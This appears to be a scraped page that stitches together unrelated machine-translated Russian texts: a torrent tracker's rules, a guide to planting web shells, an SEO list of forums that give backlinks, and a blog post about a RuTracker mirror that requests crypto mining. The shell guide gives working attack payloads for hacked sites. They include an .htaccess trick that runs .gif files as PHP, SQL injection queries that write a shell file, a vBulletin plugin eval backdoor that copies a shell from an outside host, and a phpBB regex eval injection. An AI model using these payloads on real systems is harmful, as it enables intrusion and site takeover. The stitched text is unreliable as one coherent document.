Rules and restrictions on the tracker.
1. General provisions and restrictions
1.1. These tracker rules are non-negotiable and must be unconditionally followed by everyone present on the tracker. Only Tracker Administrators are allowed not to comply with some provisions of the rules in exceptional situations.
1.2. The tracker administration is the only and highest authority where any conflict situations concerning the tracker and its users can be resolved. Thus, the decisions of the Administrators are final and cannot be appealed.
1.3. The Tracker administration reserves the right to change and supplement all clauses of these rules without prior or subsequent notice. Additions and changes to the rules come into force from the moment of their publication. However, as an act of goodwill, the Administration will try, whenever possible, to bring such changes to the attention of users.
1.4. Ignorance of these and other Tracker Rules not only does not relieve one from responsibility for violating them, but is in itself a violation and an aggravating circumstance.
1.5. It is prohibited to use any programs to falsify data about your Upload and Download. Cheaters are immediately banned.
1.7. It is prohibited to use tracker faults and errors for personal purposes. In case of detection of malfunctions and errors, you must notify the Tracker Administration.
2. Registration
Registration is an integral part of being on the tracker. Registration automatically indicates your agreement with these Rules. If you do not agree with these Rules, write to the administration.
2.1. REGISTRATION FROM VARIOUS FOREIGN PROXY SERVERS IS PROHIBITED. Violators - instant ban!!!
In exceptional cases, it is allowed only after consideration of the application by the administration.
2.2. IT IS PROHIBITED TO REGISTER MORE THAN TWO ACCOUNTS FROM ONE COMPUTER. In case of violation, all existing accounts are banned.
Registration of a new account after the existing two is possible only with the consent of the administration.
3. Rules for commenting on hands
3.1. The use of profanity in comments to distributions, any obscene words and expressions, veiled obscenities, including in foreign languages, is prohibited.
Punishment: Removal of comments that violate the rules and a ban on writing comments for a period of 1 week. Subsequent violation of this rule will result in a ban for a period of 7 days and a ban on writing comments for a period of 14 days. In the future, there will be a permanent ban on writing comments.
3.2. It is prohibited to insult tracker participants in any form. It is prohibited to display any rudeness, personal insults and obscene statements towards other participants, damaging their reputation, humiliating their honor and dignity, including public showdown of personal relationships, both in personal messages on the tracker and in comments to distributions. Participants must maintain respectful communication.
Punishment: Removal of rule-breaking comments and ban of the violator for a period of 7 days. Subsequent violation of this rule will result in a ban for 7 days and a ban on writing comments for 30 days. In the future, there will be a permanent ban on writing comments.
3.3. Threats of any nature are prohibited (virtual, real and other threats against tracker participants).
Punishment: Deleting messages and banning the offender for 14 days. If this rule is violated again, you will be banned for a month.
3.4. Flaming (messages that are off-topic, intended to start a dispute, as well as personalization of those discussing), flooding (messages that do not correspond to the topic, do not carry a semantic load, or consist only of emoticons), offtopic (messages that are not related to the topic under discussion) are prohibited. , as well as incentives to flood, flame, offtopic and messages like: “Help”, “Problem”, “What are you talking about, huh?” or “So I don’t understand - where to download from?” and the like, not related to this distribution. One comment can contain no more than 3 emoticons.
Punishment: Removal of comments that violate the rules and warning of the comment author for a period of 3 days. If this rule is violated again, the author of the comment will be banned from writing comments for a period of 7 days. In the future, for each violation, a ban on leaving comments is issued for a period of 14 days and a ban on downloading for a period of 14 days.
3.5. It is prohibited to post commercial messages, direct or indirect advertising, spam mailings and links to sites not directly related to the distribution in the comments.
Punishment: Removal of advertising, ban on writing comments for a period of 7 days and ban on downloading for a period of 7 days. In case of repeated violation, a ban on writing comments for a period of 15 days and a ban on downloading for a period of 15 days. In the future there will be a permanent ban on writing comments.
3.6. It is prohibited in comments to show racial, national and religious hostility, to agitate political parties, to promote terrorism, extremism, drugs, religion and other topics incompatible with generally accepted laws of morality and decency.
Punishment: Removal of comments that violate the rules, a ban on writing comments for a period of 14 days and a ban on downloading for a period of 14 days. In case of repeated violation, a ban on writing comments for a period of 30 days and a ban on downloading for a period of 30 days. In the future there will be a permanent ban on writing comments.
3.7. It is prohibited to leave comments that openly or covertly violate the Criminal Code of the Russian Federation, as well as messages calling for the commission of illegal actions.
Punishment: Deletion of messages, ban on writing comments for a period of 14 days and ban on downloading for a period of 14 days. In case of repeated violation, the offender is banned for a period of 30 days. For the third violation - a permanent ban.
3.8. It is prohibited in the comments to distributions to disclose any personal data of users, confidential data, real full names, publication of photographs, dissemination of information about the private life of a discussion participant that constitutes his personal or family secret, without his consent.
Punishment: Removal of rule-breaking comments and verbal warning to the tracker. In case of repeated violation, a ban on writing comments for a period of 7 days. In the future, there will be a ban on writing comments for a period of 30 days.
3.9. It is prohibited to post in comments images containing pornography, scenes of violence or any other images that humiliate or insult other users.
Punishment: Deletion of comments that violate the rules and a ban on downloading and leaving comments for a period of 7 days. In case of repeated violation, the user is banned for a period of 7 days. In the future - a ban for a period of 15 days and a permanent ban on writing comments.
3.10. It is prohibited to use a language other than Russian and a font other than Cyrillic in comments.
Punishment: Deletion of messages and a verbal warning to the user; in case of repeated violation of the rules of this paragraph, a ban on writing comments for a period of 3 days.
3.11. It is prohibited to use the following highlighting methods in messages: red, more than 75% capital letters and large font size - this is the privilege of moderators and administrators.
Punishment: Deletion of messages and a verbal warning to the user; in case of repeated violation of the rules of this paragraph, a ban on writing comments for a period of 7 days.
3.12. Overquoting is prohibited (quoting messages from other participants in quantities exceeding reasonable amounts (more than 10 lines of the original message)).
Punishment: Editing the message and verbally warning the user; in case of repeated violation of the rules of this paragraph, a ban on writing comments for a period of 3 days.
3.13. Spoilers are prohibited, and refrain from using spoilers (disclosing key plot points, the knowledge of which could ruin the viewing experience for others, the outcome of the match, etc.).
If you can’t do without spoilers, then you must include the spoiler in the [expand] tag and put the “Spoiler” mark in front of it.
Note: In “sports” distributions it is prohibited to spoil up to 11 comments (1 page).
Punishment: Editing the message and verbally warning the user. If you repeatedly violate the rules of this paragraph, you will be prohibited from writing comments for a period of 3 days.
3.14. It is prohibited to publish messages containing deliberately false information.
Punishment: Removal of rule-breaking comments and verbal warning to the user. If you repeatedly violate the rules of this paragraph, you will be prohibited from leaving comments for a period of 7 days.
The torrent comment system is designed to:
- Express your respect and gratitude to the giver,
- Ask a specific question you are interested in regarding the distribution,
- Provide interesting information related to the giveaway.
4. Restrictions on avatars and signatures:
4.1. Signature:
- Maximum height: 100 pts (in other words, no more than four userbars or ten lines of text (font size 10); width: 750 pts.
- The total weight of the images contained in the signature should not exceed 200 Kb.
- Content: violence, threats (on a demographic, national, religious or political basis), foul language (profanity, name-calling, rudeness, etc.), debauchery (pornography), discrimination in any form, texts and images of advertising or commercial are unacceptable character, imitation of titles/ranks of this resource, as well as provocative images, incl. using Nazi symbols.
- Animation: strongly blinking captions are prohibited (the degree of blinking is determined by the administration).
- The signature under your messages cannot be used to create links to any network resources. (exceptions are links to sites with userbars, services like youtube, google, etc.)
4.2. Avatar:
- Maximum size: 100x100 pixels; weight: up to 21 KB.
- Content: violence, threats (on a demographic, national, religious or political basis), foul language (profanity, name-calling, rudeness, etc.), debauchery (pornography), discrimination in any form, drug propaganda, commercial advertising and advertising texts, imitation of titles/ranks of this resource, deliberate similarity with avatars of members of the administration, as well as provocative images, incl. using Nazi symbols.
- Animation: strongly blinking avatars are prohibited (the degree of blinking is determined by the administration).
Punishment: Removal of signature and avatar, or ban on their use (determined by the administrator).
5. Releases
5.1. It is prohibited to re-upload releases to other trackers without the personal permission of the releaser. Supporting the distribution of a release that is prohibited from re-uploading on another tracker is equivalent to an independent re-upload and is punished in accordance with clause 7.
6. Other
6.1. It is prohibited to upload the contents of distributions using file hosting services such as vip-file, letitbit and others...
6.2. It is prohibited to use any download managers to download torrents.
7. Punishment:
For violations specified in paragraphs 5-6 - a ban for 7 days. Repeated violation of these rules will result in a lifetime ban.
Hello %username% and his friends. Well, you urgently need to upload a shell to the site, well, you never know, maybe the final fee depends on it. Well, it just doesn’t work out. Here I collected a couple of examples (thanks to Tracy and others for this).
Let's pour the shell through the picture
You have hacked a site (of course you are only testing) with a custom admin panel... And you cannot upload a web shell, but there is an upload of pictures and only loads .jpg, .gif, .png formats.
What can be done in this case?
We shove the shell with the extension .gif into some folder with pictures, and create a .htaccess file with the contents
AddType application/x-httpd-php .gif
This command will execute the .gif format as php
Trying to open /shell.gif
Also, if the script is not indifferent to line breaks, we try to flood the shell, simultaneously renaming it to shell.php%00.jpg, check the availability of shell.php, what if?
Method for loading a shell via mysql.user from whine
1) Let’s find out who we are sitting under and also find out his rights to mysql.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Let's find out who we're sitting under)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" our user
"+--+
(Let's check the privileges of our user. If it gives an error during the output, you can hex our user 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Path to file
"+--+
(Fill in the mini-shell)
P.S.
For everything to work, you need to have write rights and know the full path to the root.
You can also check write permissions like this:
site.com/index.php?id=1+and+1=0+union+Select+1," prava
",3+from+mysql.user+--+
If prava is displayed, then you have rights.
The following situation. We are in the admin panel of the vBulletin forum engine
Let's go:
Plugins & Products -> Plugin Manager -> Plugins & Products -> Plugin Manager -> [Add New Plugin]
Select templates. Usually we select faq_complete, select and click the Plugin is Active checkbox, set it to “Yes” and save.
localhost/forum/faq.php?cmd=phpinfo();
If we have printed phpinfo() then consider the shell in our hands.
Next in phpinfo you need to find the full path to the forum (for example /home/u0000/site.ru/www/sell.php). Next, we need to turn our web shell into a txt file and upload it to any website
mysite.com/shell.txt
Fill shell with command
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
What does this team do? It copies the contents of variable [a] to variable [b], that is, shell.txt is copied to shell.php
Loading the shell into IPB 3
Let's go:
Support->SQL Management->Running Processes->Run New Query
Code:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
You can see the full path like this:
Admin->Support
There will be a PHP version written at the top and a link to PHPINFO on the left.
Shell here:
http://site.com/uploads/shell.php
Uploading the shell to phpBB 2
1. Create the ex.sql file
2. Register there
UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Where user_id=2 is the administrator ID
3. Go to the admin panel
4. In the admin panel, select the “Restore DB” item and download ex.sql
5. Execute the code / Fill the shell like this
Let's go:
http://target/profile.php?mode=editprofile&e=phpinfo();
After:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
To display phpinfo() you need to be logged in.
This is just a short list of how and on which engines the shell can be loaded. Need more? Welcome to the guys at rdot
uploading to forums
filling on cms
And here is my favorite shell, also on rdot))
So, I think I won’t surprise anyone by saying that the more external links to your site, the larger its TCI and the larger the TCI of the referring site, the greater the “weight” of this link. There are many ways to increase the link mass to your site, but today I will talk about only one of them - obtaining external links from trust sites.
In this article, I will not give all the links to trust sites, which I know, but I’ll tell you only about one of them - forums.
By registering on forums where you can specify a website (As a rule, they are made on the same engine), you will receive an external link.
To make it clear what we are talking about, look at the screenshot below:
That is, you must simply register on such a forum, indicating the site. That's all. (Well, at most, you still have to confirm your registration, so indicate your real e-mail). Typically, a page with a link to your site will look something like this:
Now let's talk about the disadvantages of this method, in my opinion there are two of them:
1) I think that sooner or later you will be removed from the forum for inactivity (But in principle, it won’t be difficult to register again).
2) Accordingly, it is impossible to set a link anchor. (This is probably not even a minus, but a fact, but still).
Well, now list of fat forums. For convenience, in descending order of TCI:
Link (TCI)
http://forum.igromania.ru/register.php (1700) [Register, then indicate the site in your profile, save]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [Indicate the website in your profile]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)
http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [In profile]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [In profile]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________
The last database update was 06/16/11(The list has been cleared of broken links + a few more sites have been added that are below the line)
Also, thanks to a trust site, you can not only increase the TIC, but also increase site traffic! But for this you need a lot of good trust sites, and they, as a rule, are already sold for money. Well, decide for yourself whether to buy them or not...
In conclusion, I can say that do not register at once, on all forums at once, otherwise your site may fall under some kind of filter. 5-8 a day is enough in my opinion. All. Good luck. 😉
Attention!
I am writing this note in 2015 and I want to say that now, in my opinion, leaving links to your blog (site) on these or other, newer trust sites, you will only be wasting your time. Therefore, in order to avoid repeated questions in the comments, I will write here - there will be no updates to this list.
I'd better recommend checking out my list. Of course, posting messages on such blogs is also not as effective as before, but, again, in my subjective opinion, it is many times more effective.
I wrote that when you try to log in to one of the RuTracker mirrors, you receive a message stating that this is only possible if you allow the site to perform calculations on your computer, in other words, to mine cryptocurrency.
After that, I received angry messages in the comments that I was really a fool, and that the mirrors I was describing did not belong to the root tracker and were in no way connected with the root tracker itself. I didn’t attach much importance to this and in the comments to that note I asked the question, but what about the fact that the mirror rutracker-org.appspot.com repeats not only the design of the official website of the rutracker rutracker.org, but also completely repeats its contents. However, in response to this I heard that, I quote: " You are a fool Volokh and you don’t understand anything".
As befits a sane person, he begins to think about the following: If they tell me that I'm a fool, then maybe that's true? I thought so too, but it turned out that no - in this situation I’m not a fool. But first things first.
After RuTracker admins started saying in the comments that:
We have no other mirrors or “child projects”! All other root tracker “clones” that duplicate our structure and design have nothing to do with us, their use can lead to the theft of passwords, the use of your computer for cryptocurrency mining and other troubles! Maintracker is also a fake!!
I began to think, maybe I really got carried away and was in vain slandering the guys from RuTracker. Okay, I decided to compare comments from the official RuTracker website - rutracker.org and comments from the rutracker mirror rutracker-org.appspot.com, which requested permission to generate cryptocurrency. It turned out that the comments are completely identical. But no one will believe me, I decided, and wanted to take screenshots. But this idea also seemed stupid, because... comments can be easily deleted and edited.
The best idea was to record a video. Let’s take a look, and then I’ll comment on what’s happening here:
Have you looked? I’ll say right away that I present the video “as it is,” that is, without editing. Therefore, it is without any comments or voiceover. So let's figure out what's going on here.
To begin with, I created a mailbox to register on the site rutracker-org.appspot.com. Yes, exactly on the site that mines cryptocurrency. Why on it and not on the official website? rutracker.org? The fact is that I was faced with the task of showing what the sites rutracker-org.appspot.com And rutracker.org one database, that is, these sites are interconnected, contrary to the statements of the root tracker administrators.
After I opened my email, I opened the Tor browser and loaded three tabs:
1. Official website rutracker.org;
2. Mirror RuTracker rutracker-org.appspot.com;
3. Tab with an open mailbox.
After this, on the RuTracker mirror rutracker-org.appspot.com I registered (Time 00:25) and an account activation email arrived in my mailbox (Time 00:57). And here interesting dances begin, or rather creepy dances with the burning of the butt of the site administrators: the activation code contains a link to the official website of the tracker (Time 1:00):
https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF
This link is working and it leads directly to the official website rutracker.org. By clicking on the link, the account created on the mirror rutracker-org.appspot.com successfully activated on the official website rutracker.org(Time 1:06). Into the wonders of technology and the admin's miraculous thoughts. It seems that something is starting to smoke for the site administrators. Well, okay, I’m a fool, as they said, what to take from me. Go ahead.
After successfully activating my account, I go to the mirror rutracker-org.appspot.com and try to log in to the site (Time 1:45). After entering the captcha, I successfully log in using the created account on the “unofficial” tracker (Time 2:03). And at this moment the same notification appears (Time 2:07):
I click on the "Allow" button (Time 2:08) because otherwise I would not be able to log in. After that, I show that the personal account is empty and I have not left any comments yet (Time 2:20).
Now, in order to show the relationship between the mirror and the official website, I choose a random distribution on the site rutracker-org.appspot.com and leave a comment (Time 3:10). After which, on the official website rutracker.org I try to log in (Time 3:40) with an account created on the root tracker mirror. And lo and behold, the login and password from the “unofficial” mirror came up with the official website (Time 4:00). Coincidence? Don't think.
Let's go further, open the list of messages left on the tracker and what we see: a familiar distribution in the list of topics (Time 4:05). Probably also a coincidence, and for greater persuasiveness I open the comment I left on this distribution on a mirror not recognized by the admins (Time 4:17).
Comparing the comment to the distribution from the site rutracker-org.appspot.com And rutracker.org(Time 5.54) and once again we are convinced that these two sites are interconnected.
What did the site administrators write to me? It seems they convinced me that the official website and mirror rutracker-org.appspot.com are not interconnected in any way. The comments of the tracker admins clearly state that all mirrors simply duplicate the structure and design of the site, but are not interconnected. However, from what we saw, it turns out that the official website copies comments from some left-wing mirror? No, that's also nonsense. Where is the truth? The truth is that these two sites have one database, and there are many mirrors, some of which are recognized by the tracker administrators, while others are not recognized and are used to generate cryptocurrency.
It turns out that all this time, in the comments they were trying to pour some nonsense into my ears and convince me that I supposedly went to a completely wrong site, but in fact it turned out that this site also belongs to RuTracker.
I suspect that now some people will begin to experience inflammation of the fifth point and will be showered with threats, insults, etc. But I really already thought that it was in vain to attack the guys and they were not to blame for anything. It turned out to be completely different and the video is proof of that. As a colleague said: RuTracker - you were like a brother to me.
